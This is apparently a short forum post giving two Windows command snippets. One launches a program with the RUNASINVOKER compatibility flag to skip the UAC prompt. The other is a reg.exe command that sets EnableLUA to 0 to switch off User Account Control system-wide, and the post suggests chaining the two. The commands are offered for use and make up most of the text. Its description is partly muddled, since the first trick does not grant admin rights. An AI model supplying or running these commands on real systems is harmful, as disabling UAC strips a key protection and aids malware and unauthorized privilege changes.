bypass_UAC
Program bypasses the UAC prompt for Admin privileges when running a program.
- Replace [insert_program_filename] with the file_path and filename of the target program.
- Run nonadmin.cmd
- The target program will run as the currently logged in user and bypass the UAC prompt.
Код:
cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "Example.exe""
UAC_disable
This script disables the User Access Control (UAC) in the Windows Registry. Run the script throughUAC_Bypass to circumvent UAC's self-preservation module.enter code here
Код:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
